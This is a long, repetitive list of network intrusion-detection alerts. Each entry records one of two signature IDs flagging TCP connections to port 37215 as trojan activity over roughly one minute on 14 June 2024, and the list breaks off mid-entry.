                SID:2835222
                Source Port:52586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083871
                SID:2835222
                Source Port:51628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944794
                SID:2829579
                Source Port:37562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274546
                SID:2829579
                Source Port:44686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640762
                SID:2829579
                Source Port:54560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662023
                SID:2829579
                Source Port:52952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984357
                SID:2835222
                Source Port:53594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646314
                SID:2829579
                Source Port:49968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229886
                SID:2835222
                Source Port:39650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878966
                SID:2829579
                Source Port:48780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830494
                SID:2829579
                Source Port:50348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860184
                SID:2835222
                Source Port:56658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732238
                SID:2835222
                Source Port:48388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111161
                SID:2829579
                Source Port:60830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183084
                SID:2835222
                Source Port:60908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858871
                SID:2835222
                Source Port:48382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420638
                SID:2829579
                Source Port:60336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679500
                SID:2835222
                Source Port:40462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453337
                SID:2829579
                Source Port:48204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667399
                SID:2829579
                Source Port:55788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813025
                SID:2829579
                Source Port:47148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519824
                SID:2829579
                Source Port:56040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850352
                SID:2829579
                Source Port:43160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679206
                SID:2829579
                Source Port:41646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967742
                SID:2829579
                Source Port:42678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807989
                SID:2829579
                Source Port:59160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383006
                SID:2835222
                Source Port:49234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970623
                SID:2829579
                Source Port:57234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704046
                SID:2835222
                Source Port:42046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452189
                SID:2829579
                Source Port:37500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326591
                SID:2829579
                Source Port:53610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289613
                SID:2829579
                Source Port:54514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294296
                SID:2835222
                Source Port:44426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663014
                SID:2829579
                Source Port:48158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521632
                SID:2835222
                Source Port:54684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087800
                SID:2835222
                Source Port:43868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997114
                SID:2829579
                Source Port:32844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410693
                SID:2835222
                Source Port:35736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025132
                SID:2835222
                Source Port:50742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225793
                SID:2835222
                Source Port:54042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.947040
                SID:2829579
                Source Port:46246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.883187
                SID:2829579
                Source Port:38172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052924
                SID:2829579
                Source Port:53724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019150
                SID:2835222
                Source Port:35610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143188
                SID:2835222
                Source Port:50154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703533
                SID:2835222
                Source Port:56068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717532
                SID:2829579
                Source Port:42704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199888
                SID:2835222
                Source Port:56248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791885
                SID:2829579
                Source Port:37254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988874
                SID:2829579
                Source Port:58154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700495
                SID:2829579
                Source Port:41980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.723313
                SID:2835222
                Source Port:53062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848365
                SID:2835222
                Source Port:50244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703152
                SID:2829579
                Source Port:50806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024186
                SID:2835222
                Source Port:49804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808324
                SID:2829579
                Source Port:35256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182234
                SID:2829579
                Source Port:38064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.425101
                SID:2829579
                Source Port:60336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.448602
                SID:2829579
                Source Port:38642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324910
                SID:2829579
                Source Port:40334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616760
                SID:2835222
                Source Port:54764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.070397
                SID:2829579
                Source Port:56774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134279
                SID:2829579
                Source Port:45694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548891
                SID:2835222
                Source Port:55902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791925
                SID:2829579
                Source Port:52168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544270
                SID:2835222
                Source Port:51572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179975
                SID:2835222
                Source Port:41918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762000
                SID:2829579
                Source Port:42164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761078
                SID:2829579
                Source Port:59404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966821
                SID:2829579
                Source Port:53602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989422
                SID:2829579
                Source Port:44942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229259
                SID:2829579
                Source Port:54072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149930
                SID:2829579
                Source Port:44746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277909
                SID:2835222
                Source Port:34422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862275
                SID:2829579
                Source Port:36504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.364733
                SID:2835222
                Source Port:53340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.767021
                SID:2835222
                Source Port:45474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420571
                SID:2829579
                Source Port:57788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135029
                SID:2829579
                Source Port:58680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133524
                SID:2835222
                Source Port:59858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452707
                SID:2829579
                Source Port:38220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789653
                SID:2829579
                Source Port:50864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177137
                SID:2829579
                Source Port:60184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382409
                SID:2835222
                Source Port:39234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941999
                SID:2829579
                Source Port:45442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.385656
                SID:2829579
                Source Port:35868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132733
                SID:2835222
                Source Port:40134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025766
                SID:2829579
                Source Port:35308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563826
                SID:2829579
                Source Port:40716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368461
                SID:2829579
                Source Port:51482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201458
                SID:2835222
                Source Port:54964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179171
                SID:2835222
                Source Port:55118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965603
                SID:2835222
                Source Port:56020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882806
                SID:2829579
                Source Port:58030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685062
                SID:2835222
                Source Port:47744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411272
                SID:2835222
                Source Port:49334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150324
                SID:2829579
                Source Port:49616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250476
                SID:2829579
                Source Port:57804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343084
                SID:2829579
                Source Port:46018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717242
                SID:2829579
                Source Port:51834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677487
                SID:2829579
                Source Port:46556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943571
                SID:2835222
                Source Port:45408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669496
                SID:2835222
                Source Port:48536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913307
                SID:2835222
                Source Port:57578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688666
                SID:2829579
                Source Port:60562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471414
                SID:2829579
                Source Port:33384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666047
                SID:2829579
                Source Port:41524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202577
                SID:2835222
                Source Port:45200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543677
                SID:2835222
                Source Port:49804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.719043
                SID:2829579
                Source Port:50452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544356
                SID:2835222
                Source Port:58276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074991
                SID:2829579
                Source Port:36750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181218
                SID:2835222
                Source Port:41546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245739
                SID:2829579
                Source Port:40524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545274
                SID:2829579
                Source Port:43126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185810
                SID:2829579
                Source Port:44328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323263
                SID:2829579
                Source Port:42320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.716944
                SID:2829579
                Source Port:48574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412319
                SID:2835222
                Source Port:45188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160455
                SID:2829579
                Source Port:37344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705666
                SID:2835222
                Source Port:49198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830978
                SID:2835222
                Source Port:41344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014780
                SID:2829579
                Source Port:59652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717993
                SID:2829579
                Source Port:38032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146319
                SID:2835222
                Source Port:60140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.899228
                SID:2829579
                Source Port:38622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545782
                SID:2835222
                Source Port:44402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804581
                SID:2835222
                Source Port:44996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830431
                SID:2835222
                Source Port:40430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986178
                SID:2835222
                Source Port:54308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644442
                SID:2829579
                Source Port:54446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.912717
                SID:2835222
                Source Port:36898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805155
                SID:2829579
                Source Port:56226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453951
                SID:2829579
                Source Port:43740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984145
                SID:2829579
                Source Port:55446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791244
                SID:2835222
                Source Port:49906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290379
                SID:2829579
                Source Port:58888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.904964
                SID:2829579
                Source Port:51690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383253
                SID:2835222
                Source Port:52432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897996
                SID:2835222
                Source Port:37460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200894
                SID:2835222
                Source Port:37702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808128
                SID:2829579
                Source Port:34600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860452
                SID:2835222
                Source Port:35064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969397
                SID:2835222
                Source Port:48408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848509
                SID:2835222
                Source Port:56218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253694
                SID:2829579
                Source Port:37836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724299
                SID:2829579
                Source Port:42832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133108
                SID:2835222
                Source Port:43710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115618
                SID:2835222
                Source Port:48830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091201
                SID:2835222
                Source Port:56736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.723904
                SID:2829579
                Source Port:44974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716393
                SID:2829579
                Source Port:35528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407750
                SID:2829579
                Source Port:55498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324591
                SID:2829579
                Source Port:56740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705199
                SID:2829579
                Source Port:54136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134552
                SID:2835222
                Source Port:56158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763601
                SID:2829579
                Source Port:48020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943529
                SID:2835222
                Source Port:45794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717484
                SID:2829579
                Source Port:59228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779661
                SID:2835222
                Source Port:58916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676029
                SID:2835222
                Source Port:37366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989797
                SID:2829579
                Source Port:34794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057690
                SID:2829579
                Source Port:33224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676488
                SID:2829579
                Source Port:42064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342565
                SID:2829579
                Source Port:59926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409838
                SID:2829579
                Source Port:34508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201533
                SID:2835222
                Source Port:42982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150798
                SID:2835222
                Source Port:42384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074460
                SID:2835222
                Source Port:60038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917241
                SID:2829579
                Source Port:59266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227283
                SID:2829579
                Source Port:48022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568454
                SID:2835222
                Source Port:34288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986053
                SID:2835222
                Source Port:58876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717971
                SID:2835222
                Source Port:47934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034633
                SID:2829579
                Source Port:34706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505319
                SID:2835222
                Source Port:53156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325888
                SID:2829579
                Source Port:57238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762396
                SID:2835222
                Source Port:41096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016573
                SID:2829579
                Source Port:34848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679393
                SID:2829579
                Source Port:53880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828694
                SID:2835222
                Source Port:44236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968205
                SID:2835222
                Source Port:57258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133764
                SID:2835222
                Source Port:50134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366756
                SID:2835222
                Source Port:53558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.569568
                SID:2835222
                Source Port:59866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225253
                SID:2835222
                Source Port:50254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942195
                SID:2829579
                Source Port:43868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159874
                SID:2829579
                Source Port:39334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716837
                SID:2835222
                Source Port:34628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688883
                SID:2829579
                Source Port:33092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186531
                SID:2829579
                Source Port:35968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792578
                SID:2835222
                Source Port:57720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055559
                SID:2835222
                Source Port:60716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850457
                SID:2829579
                Source Port:45988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322082
                SID:2829579
                Source Port:46028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337163
                SID:2835222
                Source Port:34478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.987423
                SID:2829579
                Source Port:33240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898278
                SID:2829579
                Source Port:35812
                Destination Port:37215
